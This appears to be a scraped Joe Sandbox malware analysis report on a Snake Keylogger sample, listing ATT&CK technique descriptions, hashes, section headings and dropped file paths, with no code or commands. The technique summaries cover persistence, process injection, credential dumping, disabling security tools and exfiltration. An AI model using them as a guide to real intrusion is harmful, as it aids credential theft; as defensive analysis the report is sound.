Instruction Fuzzy Hash: 7331307550E3C08FD707CB20D9A4715BF71AF47224F1985DBD889CF2A7C22A980ACB62

Function 00F3D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4699450279.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f3d000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b0a3f540a516d061acc6d1f890b853f35a892992a53c2e4e011faed1e81be6d
Instruction ID: b17e07c88ce061759a0b5a18ebec260b548090e0818f6b682315c5fefd59964a
Opcode Fuzzy Hash: 4b0a3f540a516d061acc6d1f890b853f35a892992a53c2e4e011faed1e81be6d
Instruction Fuzzy Hash: 8D2137B1504204DFDB18DF20E9C0B16BB65FB84734F30C56DE8094B256C736D847EA61

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hesaphareketi-01.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WvaGpcFVX.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi-01.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vivh03m.opm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5eplu0ek.y5z.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xq1hcwo.jfg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fc0l51dn.cgk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5zuv2kr.nr0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_msafu4l2.3vy.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quolovpg.tqh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmhpdgx0.xeu.ps1

C:\Users\user\AppData\Local\Temp\tmp470C.tmp

Windows Analysis Report
hesaphareketi-01.exe

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre